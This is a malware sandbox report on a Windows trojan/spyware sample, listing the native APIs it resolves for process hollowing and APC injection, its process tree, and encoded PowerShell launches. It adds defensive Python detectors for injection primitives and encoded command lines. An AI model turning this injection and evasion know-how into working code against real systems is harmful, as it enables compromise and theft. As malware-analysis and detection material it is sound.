          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 0_2_016C6AA0
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 0_2_016C5390
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 0_2_016C5317
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 0_2_016CF390
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 0_2_016C774D
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 0_2_016C7960
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_00403853
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_00401B30
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_004055B3
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_00420633
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_0040BF6F
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_0040BF73
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_004057D3
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_004017D8
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_004017E0
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_01784120
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_0176F900
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_018320A8
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_018328EC
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_01821002
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_0183E824
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_017920A0
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_0177B090
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_0182DBD2
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_01832B28
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_0179EBB0
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_018322AE
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_01760D20
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_018325DD
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_01832D07
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_0177D5E0
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_01831D55
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_01792581
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_0177841F
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_0182D466
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_01831FF1
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_01786E30
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_01832EF7
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_0182D616
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: String function: 0176B150 appears 35 times
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_0041E543 NtCreateFile,
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_0041E5F3 NtReadFile,
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_0041E673 NtClose,
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_0041E723 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_017A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_017A99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_017A9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_017A9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_017A98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_017A9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_017A9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_017A9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_017A9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_017A95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_017A9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_017A9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_017A97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_017A9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017AB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017AA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9560 NtWriteFile,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017AAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017AA770 NtOpenThread,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017AA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A96D0 NtCreateKey,
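The Nt* functions resolved above are the primitives behind the process-hollowing, APC-queueing and thread-context signatures raised for this sample: a process is created (NtCreateProcessEx), its image is unmapped (NtUnmapViewOfSection), memory is allocated and written (NtAllocateVirtualMemory, NtWriteVirtualMemory), the main thread's context is redirected (NtGetContextThread/NtSetContextThread) and the thread is resumed (NtResumeThread), with NtQueueApcThread and NtCreateSection/NtMapViewOfSection available as alternative ways to get the payload running. The following is an added example, not code from the report or from Joe Sandbox: a Python matcher that parses `Code function` lines of this form and reports which technique's complete set of primitives a process resolves. The slot tables (which APIs make up hollowing, APC injection and section mapping) are this example's own simplification of how those techniques are normally implemented, and the embedded excerpt is a constructed subset of the lines above; the matcher only reads the `Code function` field, so the column layout of the page does not matter.

```python
import re
from typing import Dict, List, Set

# Constructed input: a subset of the "Code function" lines from the report,
# in the form the listing was extracted in. Only the lines that carry
# resolved native-API names matter to the matcher.
REPORT_EXCERPT = r"""
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_01784120
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_0041E543 NtCreateFile,
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_017A99D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_017A97A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_017A9660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_017A98A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_017AA3B0 NtGetContextThread,
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_017AAD30 NtSetContextThread,
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_017A9A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_017A9950 NtQueueApcThread,
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_017A99A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\SC_0017384.exe | Code function: 3_2_017A9780 NtMapViewOfSection,LdrInitializeThunk,
"""

# Each technique is a list of slots; a slot is satisfied by any one of the
# APIs in it. These tables are this example's assumption about how the
# techniques are usually implemented, not something the report states.
TECHNIQUES: Dict[str, List[Set[str]]] = {
    "process_hollowing": [
        {"NtCreateProcessEx", "NtCreateUserProcess", "NtCreateProcess"},  # target process
        {"NtUnmapViewOfSection"},                                          # hollow it out
        {"NtAllocateVirtualMemory", "NtMapViewOfSection"},                 # room for the payload
        {"NtWriteVirtualMemory", "NtMapViewOfSection"},                    # put the payload there
        {"NtSetContextThread"},                                            # point EIP/EAX at it
        {"NtResumeThread"},                                                # run it
    ],
    "apc_injection": [
        {"NtAllocateVirtualMemory", "NtMapViewOfSection"},
        {"NtWriteVirtualMemory", "NtMapViewOfSection"},
        {"NtQueueApcThread"},                         # payload runs when the thread is alertable
        {"NtResumeThread", "NtAlertResumeThread"},    # early-bird style: queue, then resume
    ],
    "section_mapping": [
        {"NtCreateSection"},
        {"NtMapViewOfSection"},                       # one section viewed in both processes
        {"NtSetContextThread", "NtQueueApcThread", "NtCreateThreadEx"},
    ],
}

# "<pid>_<run>_<address> Name1,Name2," ; the address is hex, names are optional.
LINE_RE = re.compile(r"Code function:\s*(\d+)_(\d+)_([0-9A-Fa-f]+)\s*(.*)$")


def parse_resolved_apis(report_text: str) -> Dict[str, Set[str]]:
    """Map '<pid>_<run>' to the set of API names the sandbox resolved in that process."""
    apis: Dict[str, Set[str]] = {}
    for line in report_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        key = f"{m.group(1)}_{m.group(2)}"
        names = {n.strip() for n in m.group(4).split(",") if n.strip()}
        apis.setdefault(key, set()).update(names)
    return apis


def matched_techniques(apis: Set[str]) -> Dict[str, List[str]]:
    """Return technique -> sorted APIs that satisfied it, for techniques whose every slot is covered."""
    result: Dict[str, List[str]] = {}
    for name, slots in TECHNIQUES.items():
        if any(not (slot & apis) for slot in slots):
            continue  # at least one slot has no resolved API: not a full match
        result[name] = sorted(set().union(*slots) & apis)
    return result


def match_injection_primitives(report_text: str) -> Dict[str, Dict[str, List[str]]]:
    """Per process key, the fully matched techniques and the APIs behind each."""
    return {key: matched_techniques(names) for key, names in parse_resolved_apis(report_text).items()}


if __name__ == "__main__":
    for proc, techniques in match_injection_primitives(REPORT_EXCERPT).items():
        for technique, used in techniques.items():
            print(f"{proc}: {technique} <- {', '.join(used)}")
```

Resolving these functions is weaker evidence than calling them in sequence; the matcher answers "does this process have everything it needs for technique X", which is the right question for a static listing like this one. Given an API trace with ordering (from a hook-based sandbox or ETW), the same slot table can be applied as an ordered subsequence match instead of a set intersection.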
Source: SC_0017384.exe, 00000000.00000002.385968571.000000000419A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameXnrxjhztihgifcu.dll" vs SC_0017384.exe
Source: SC_0017384.exe, 00000000.00000000.299213508.0000000000D98000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameNevqazdmhd.exe" vs SC_0017384.exe
Source: SC_0017384.exe, 00000000.00000002.400969818.00000000068FF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameNevqazdmhd.exe" vs SC_0017384.exe
Source: SC_0017384.exe, 00000000.00000002.401744017.0000000006980000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameXnrxjhztihgifcu.dll" vs SC_0017384.exe
Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs SC_0017384.exe
Source: SC_0017384.exe, 00000000.00000002.382705892.0000000003222000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs SC_0017384.exe
Source: SC_0017384.exe, 00000000.00000002.381865907.0000000001399000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs SC_0017384.exe
Source: SC_0017384.exe, 00000000.00000002.385968571.0000000004CFA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs SC_0017384.exe
Source: SC_0017384.exe, 00000000.00000002.400969818.00000000068AE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs SC_0017384.exe
Source: SC_0017384.exe, 00000000.00000002.404394395.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs SC_0017384.exe
Source: SC_0017384.exe, 00000003.00000003.381474937.0000000001523000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs SC_0017384.exe
Source: SC_0017384.exe, 00000003.00000003.383573088.00000000016CB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs SC_0017384.exe
Source: SC_0017384.exe, 00000003.00000002.432025851.000000000185F000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs SC_0017384.exe
Source: SC_0017384.exe | Binary or memory string: OriginalFilenameNevqazdmhd.exe" vs SC_0017384.exe
Source: SC_0017384.exe | ReversingLabs: Detection: 12%
Source: SC_0017384.exe | Virustotal: Detection: 17%
Source: C:\Users\user\Desktop\SC_0017384.exe | File read: C:\Users\user\Desktop\SC_0017384.exe
Source: SC_0017384.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SC_0017384.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\SC_0017384.exe C:\Users\user\Desktop\SC_0017384.exe
Source: C:\Users\user\Desktop\SC_0017384.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SC_0017384.exe | Process created: C:\Users\user\Desktop\SC_0017384.exe C:\Users\user\Desktop\SC_0017384.exe
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe "C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe"
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe "C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe"
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Process created: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Process created: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe
Source: C:\Users\user\Desktop\SC_0017384.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
Source: C:\Users\user\Desktop\SC_0017384.exe | Process created: C:\Users\user\Desktop\SC_0017384.exe C:\Users\user\Desktop\SC_0017384.exe
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe "C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe"
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe "C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe"
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Process created: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Process created: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe
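Three things in the process tree above deserve a second look. Each stage (the original sample and the dropped Lvdnyvcvr.exe) launches a second copy of its own image, which is the host process for the hollowing described by the Nt* listing. explorer.exe, which the sample does not start, launches both the dropped %AppData% binary and an argument-less C:\Windows\SysWOW64\systray.exe, consistent with code having been injected into explorer.exe. And every stage runs powershell.exe with an -ENC argument. That argument is base64 over UTF-16LE text; the blob on these lines decodes to `start-sleep -seconds 20`, a delay rather than a payload, which matches the "execution stops while process was sleeping" signature in the summary. The following is an added example, not part of the report: a Python parser for `Process created` lines that decodes any -EncodedCommand spelling PowerShell accepts (-e, -ec, -enc, -encodedcommand and prefixes in between) and applies those three heuristics. The embedded event lines are copied from the listing above; the heuristics and their wording are this example's own and need tuning on real telemetry, since explorer.exe launching a program from AppData is also what a user double-click looks like.

```python
import base64
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed input: "Process created" lines copied from the report listing.
# The parser keys on the text after "Process created:" and on the parent image
# before it, so it does not depend on how the page's columns were separated.
PROCESS_EVENTS = r"""
Source: unknown | Process created: C:\Users\user\Desktop\SC_0017384.exe C:\Users\user\Desktop\SC_0017384.exe
Source: C:\Users\user\Desktop\SC_0017384.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
Source: C:\Users\user\Desktop\SC_0017384.exe | Process created: C:\Users\user\Desktop\SC_0017384.exe C:\Users\user\Desktop\SC_0017384.exe
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe "C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe"
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
"""

EVENT_RE = re.compile(r"^Source:\s*(.*?)Process created:\s*(.+)$")
TOKEN_RE = re.compile(r'"[^"]*"|\S+')  # Windows-style split: quoted strings or bare words


@dataclass
class ProcessEvent:
    parent: str       # image of the creating process ("unknown" when the sandbox did not see it)
    image: str        # image of the created process
    args: List[str]   # command-line tokens, argv[0] included, surrounding quotes removed


def parse_process_events(text: str) -> List[ProcessEvent]:
    events = []
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if not m:
            continue
        parent = m.group(1).rstrip(" |").strip()
        tokens = [t.strip('"') for t in TOKEN_RE.findall(m.group(2))]
        events.append(ProcessEvent(parent=parent, image=tokens[0], args=tokens[1:]))
    return events


def decode_encoded_command(args: List[str]) -> Optional[str]:
    """Script behind -EncodedCommand: base64 of UTF-16LE. Accepts -e, -ec, -enc, ... prefixes."""
    for i, tok in enumerate(args[:-1]):
        flag = tok.lower()
        if not flag.startswith("-"):
            continue
        name = flag[1:]
        # "-ec" is an explicit alias; otherwise any prefix of "encodedcommand" that starts with "e"
        # (so "-ex"/"-ep" for -ExecutionPolicy are not matched).
        if not (name == "ec" or (name.startswith("e") and "encodedcommand".startswith(name))):
            continue
        blob = args[i + 1]
        blob += "=" * (-len(blob) % 4)  # tolerate stripped padding
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return None
    return None


def assess(event: ProcessEvent) -> List[str]:
    """Heuristics of this example (not the sandbox's signatures); returns the reasons that fired."""
    parent, image = event.parent.lower(), event.image.lower()
    reasons = []
    if parent == image:
        reasons.append("self-spawn: launched a second copy of its own image (typical hollowing host)")
    if image.endswith("\\powershell.exe"):
        script = decode_encoded_command(event.args)
        if script is not None:
            reasons.append(f"encoded PowerShell decodes to: {script!r}")
    if parent.endswith("\\explorer.exe") and "\\appdata\\roaming\\" in image:
        reasons.append("explorer.exe launched a binary from AppData\\Roaming")
    if parent.endswith("\\explorer.exe") and "\\syswow64\\" in image and len(event.args) <= 1:
        reasons.append("explorer.exe launched a 32-bit system binary with no arguments")
    return reasons


def flag_process_events(text: str) -> List[Tuple[str, List[str]]]:
    """(child basename, reasons) for every event at least one heuristic fired on."""
    flagged = []
    for ev in parse_process_events(text):
        reasons = assess(ev)
        if reasons:
            flagged.append((ev.image.rsplit("\\", 1)[-1], reasons))
    return flagged


if __name__ == "__main__":
    for name, reasons in flag_process_events(PROCESS_EVENTS):
        print(name)
        for reason in reasons:
            print("  -", reason)
```

The decoder is the piece worth keeping: Sysmon event 1 and EDR command lines carry the same -ENC blobs, and a 20-second sleep looks harmless until it is correlated with the parent that ran it and the self-spawn that follows.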
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32
Source: C:\Users\user\Desktop\SC_0017384.exe | File created: C:\Users\user\AppData\Roaming\Jqtuyob
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dgjipv3a.uw1.ps1
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@26/13@11/7
Source: C:\Users\user\Desktop\SC_0017384.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: SC_0017384.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\SC_0017384.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6048:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:472:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:572:120:WilError_01
Source: C:\Users\user\Desktop\SC_0017384.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\SC_0017384.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\SC_0017384.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\SysWOW64\systray.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: SC_0017384.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: SC_0017384.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
